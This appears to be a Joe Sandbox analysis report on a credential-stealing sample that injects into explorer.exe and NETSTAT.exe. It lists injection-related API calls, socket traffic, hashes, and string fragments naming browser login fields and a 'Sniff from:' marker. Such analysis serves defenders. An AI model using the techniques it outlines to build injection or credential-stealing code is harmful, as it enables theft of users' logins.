                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                  • Instruction ID: 8bb8bff4984f6f0ce39d4f9f992fa81d29c03748db6039b7e9c05220306aa750
                                                                                                                                                                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 73015A30618B188FCB94EF5CE088B55B7E0FB58324F1545AEE90DCB226CA74D9818BC2

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 294 fba5732-fba5768 295 fba576a-fba5782 call fba8942 294->295 296 fba5788-fba57ab connect 294->296 295->296
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                  • Instruction ID: f7b58716dda28542808f8b7ed226bb8e8cb41cd4848c561392c98f19a8c0a2c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98012C70618A1C8FCB94EF5CE088B55B7E0FB59315F1545AEA80DCB226CA74C9818BC2

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 407 fba56b2-fba56e5 408 fba56e7-fba56ff call fba8942 407->408 409 fba5705-fba572d send 407->409 408->409
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                  • String ID: send
                                                                                                                                                                                  • API String ID: 2809346765-2809346765
                                                                                                                                                                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                  • Instruction ID: d31a621b62d2a304ce8aa920df1e9b744be985cf3faf8a0196d7a3495094dd69
                                                                                                                                                                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                  • Instruction Fuzzy Hash: D901127051CA188FDB84EF5CE048B2577E0EB58315F1545AED85DCB266C670D8818B81

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 412 fba55b2-fba55ea 413 fba560a-fba562b socket 412->413 414 fba55ec-fba5604 call fba8942 412->414 414->413
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                  • String ID: sock
                                                                                                                                                                                  • API String ID: 98920635-2415254727
                                                                                                                                                                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                  • Instruction ID: aef865550df478dff00008893465f37252b04127970600214c5b64aba6cb8f9b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A012C70618A188FCB84EF5CE048B54BBE0FB59314F1545AEE85ECB266C7B4C9818B86

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 417 fb9d2dd-fb9d320 call fba8942 420 fb9d3fa-fb9d40e 417->420 421 fb9d326 417->421 422 fb9d328-fb9d339 SleepEx 421->422 422->422 423 fb9d33b-fb9d341 422->423 424 fb9d34b-fb9d352 423->424 425 fb9d343-fb9d349 423->425 427 fb9d370-fb9d376 424->427 428 fb9d354-fb9d35a 424->428 425->424 426 fb9d35c-fb9d36a call fba7f12 425->426 426->427 429 fb9d378-fb9d37e 427->429 430 fb9d3b7-fb9d3bd 427->430 428->426 428->427 429->430 432 fb9d380-fb9d38a 429->432 433 fb9d3bf-fb9d3cf call fb9de72 430->433 434 fb9d3d4-fb9d3db 430->434 432->430 436 fb9d38c-fb9d3b1 call fb9e432 432->436 433->434 434->422 438 fb9d3e1-fb9d3f5 call fb9d0f2 434->438 436->430 438->422
APIs
Memory Dump Source
• Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0

Control-flow Graph (graph rendering not preserved in extraction)
APIs
Memory Dump Source
• Source File: 00000006.00000002.4161475823.000000000FB50000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FB50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fb50000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
• API String ID: 0-1539916866
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
• API String ID: 0-355182820
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: .$0$c$n$r$r$r$r$r$r$r$r
• API String ID: 0-97273177
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 0-2058692283
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $.$e$n$v
                                                                                                                                                                                  • API String ID: 0-1849617553
                                                                                                                                                                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                  • Instruction ID: dca1592bca68c5f563ed651a1f1e45faffd1bb22a5fdde658b004a21dee63c98
                                                                                                                                                                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5071C5716187498FD758EF68C4847AAB7F1FF99304F00062ED54AC7222EF74E9498B85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                  • API String ID: 0-1970020201
                                                                                                                                                                                  • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                  • Instruction ID: 700e870036a4e0a30eabb96694327b604d6af0409252c7e6ab1b1b4b6e15ad3e
                                                                                                                                                                                  • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0515AB0918B4D8FDB64EFA4C044AEEB7F1FF68300F40462E959AE7215EF3095458B89
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                  • API String ID: 0-1610437797
                                                                                                                                                                                  • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                  • Instruction ID: c206ad14bdf70abf2d3d042c5f74b63517a4e11c8c118ba719d9b3655bcaa519
                                                                                                                                                                                  • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D416F31219B488BCB65EF38D8457EAB3E4FB98301F40462E999EC7245EF30D6498786
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                  • API String ID: 0-327345718
                                                                                                                                                                                  • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                  • Instruction ID: 306212883814fa0a7e97bcce8e33d0afbc3961caac618f4d5ef3fda87daf3386
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89416031A19F0D8FCB94EF6884947ED77E1FB78300F64416AA80ED7311DA75D9418B86
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                  • Instruction ID: 7f4261cf69455eded347e4f77d92d6f83b7c9df7be6dbe4cb3666f1507c7a899
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: B641BF71608B488FD7A8DF2880843BAB7E1FBA8304F504A2E959EC7266DF70D445CB81
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                  • Instruction ID: 1e164df10196322304f2ee6e98425f4ee17f4cf8681aa3e1bfb8cfc81f9a13ff
                                                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531203050DB886FD71AEB28C4846EAB7D4FB94300F50491EE59BC7252EE34A50ECB47
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                                                  • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                  • Instruction ID: f0053e1a1f0a547b142de00e3a9b3c43ca1d48e08bb2060f866a9c233d6302b1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531F27151CB486FD719EF28C4846EAB7D4FB94300F40491EE59BC3252EE34E50ACA47
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                                                  • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                  • Instruction ID: dd65152f63021ce8f0a67be1f3f763d99cf2047faa42e0d2bdc72d20070d5c43
                                                                                                                                                                                  • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E318F71218B488FCB84EF688494BAAB7E1FF98300F94466D954ECB316DF34D909CB56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                  • API String ID: 0-3136806129
                                                                                                                                                                                  • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                  • Instruction ID: ff5917a566f22be41f5c4d70227ea17a867534f93c15b2045ece7322484b7978
                                                                                                                                                                                  • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                  • Instruction Fuzzy Hash: C431AE71218B488FCB84EF688494BAAB7E1FF98300F94462D954ECB356DF34C909CB56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                  • Instruction ID: 533d470505412cdf999be3c4e9946149e3d0acadfa0ebd8ce786bb17fa1b9f27
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: 7931CE31614B0D8FCB04EFA8C8947EEBBE0FF58204F40422ED95ED7251DE7886498B89
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 0-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: bfd59aeed2bd94c4beb4bbce9386ee92035a08c945b6cfa6917a725507c567c3
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: 1D21CE70A10B0D8ACB04EFA9C8947EDBBA0FF58204F40422ED55AD7252DE7886098B89
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
• Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
• Instruction ID: 5a482a7089eb255435713aba8522f16ea1f087a799cdf1a4d7a3c834eb57d98a
• Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
• Instruction Fuzzy Hash: E3215A70A24B0E9BDB48EFA8D4447EEBBF1FB58304F50462ED109D3601DB7995958B88
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: .$l$l$t
• API String ID: 0-168566397
• Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
• Instruction ID: 2103bff5de70ea719a5e5767bbb5d83d7f5dffa5763941771d2733da219b9186
• Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
• Instruction Fuzzy Hash: 9C217A70A24B0E9BDB48EFA8C4447AEBAF1FF58300F50462ED109D3611DB789595CB88
Strings
Memory Dump Source
• Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
Similarity
• API ID:
• String ID: auth$logi$pass$user
• API String ID: 0-2393853802
• Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
• Instruction ID: 66271487f2cdbb6ff7a527266f797930b883df96f1eb625432f86e018c6213cb
• Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
• Instruction Fuzzy Hash: A221A13062470D4BCB05DF9D98807DEB7E1EF88344F00461AA40ADB345DBB4D9548BC6

Execution Graph

Execution Coverage: 1.7%
Dynamic/Decrypted Code Coverage: 6.8%
Signature Coverage: 0%
Total number of Nodes: 621
Total number of Limit Nodes: 74
execution_graph: [interactive execution-graph figure not reproduced; the page carried only its serialized node and edge list. Nodes are numbered function addresses (e.g. 103989 3112ad0, 103995 26bb9a0, 104706 2eea042) joined by caller->callee edges; API calls named on graph nodes: LdrInitializeThunk, LdrLoadDll, NtClose, NtCreateFile, NtReadFile, RtlAllocateHeap, RtlFreeHeap, NtAllocateVirtualMemory, LookupPrivilegeValueW, CreateProcessInternalW, SetErrorMode, Sleep, NtQueryInformationProcess, NtSuspendThread, NtCreateSection, NtMapViewOfSection, NtSetContextThread, NtResumeThread, NtQueueApcThread.]

Control-flow Graph (rendered graph not reproduced)

APIs
• NtQueryInformationProcess.NTDLL ref: 02EEA19F
Strings
Memory Dump Source
• Source File: 00000007.00000002.4143613392.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2ee0000_NETSTAT.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction ID: 46e4141ede3aceffd525175febe769b5a78d33a667fcf9fbad184bffebc6698c
• Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction Fuzzy Hash: 7CF15E70958A8C8FDFA9EF68C894AEEB7E1FB99304F40562EE44AD7250DF309541CB41

Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced). Basic blocks 2ee9baf-2ee9ddc; calls: 2ee9102, 2eeb942 (x2), NtCreateSection, NtMapViewOfSection, 2ee9172, 2eecd62, NtClose.

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4143613392.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2ee0000_NETSTAT.jbxd
Similarity
• API ID: Section$CloseCreateView
• String ID: @$@
• API String ID: 1133238012-149943524
• Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction ID: 9cbad3ac0525d7af47ae1624e7ad01b63b1f68fec511176afe1c81f62c70fc2f
• Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction Fuzzy Hash: EF617070518B488FCB58EF68D8856AEBBE0FB98314F50462EE98AC3651DB35D441CB86

Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced). Basic blocks 2ee9bb2-2ee9ddc; calls: 2ee9102, 2eeb942 (x2), NtCreateSection, NtMapViewOfSection, 2ee9172, 2eecd62, NtClose.

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4143613392.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2ee0000_NETSTAT.jbxd
Similarity
• API ID: Section$CreateView
• String ID: @$@
• API String ID: 1585966358-149943524
• Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction ID: 4512d383d85cb6db1b1f9ef5c27c6c08e242325cf640c3020954d6c3870b2d2a
• Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction Fuzzy Hash: A7517E70618B488FCB58DF18D8956AEBBE0FB98314F50462EF98AC3651DF35D441CB86

Control-flow Graph (rendered graph not reproduced)

APIs
• NtQueryInformationProcess.NTDLL ref: 02EEA19F
Strings
Memory Dump Source
• Source File: 00000007.00000002.4143613392.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2ee0000_NETSTAT.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction ID: 8093d70e9349f9415b438ec668e1b59d86130cf822b19a57abe9b1d5ca19facf
• Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction Fuzzy Hash: A3512D70914A8C8FDB69EF68C8946EEB7F5FB98305F40462EE44AD7250DF309645CB41

Control-flow Graph (legend: Executed / Not Executed; rendered graph not reproduced). Basic blocks 26ba2ea-26ba381; calls: 26baf30 (x2), NtCreateFile.

APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,026B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,026B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 026BA37D
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 60ba23054b50635cf57a664ecaabc91fb639b4254705df40474ddd73745a59cc
• Instruction ID: 7b3a959a3df8fbc299cdf1006399ac394fa74f0ed4bd17a40ac70d8c1dc30002
• Opcode Fuzzy Hash: 60ba23054b50635cf57a664ecaabc91fb639b4254705df40474ddd73745a59cc
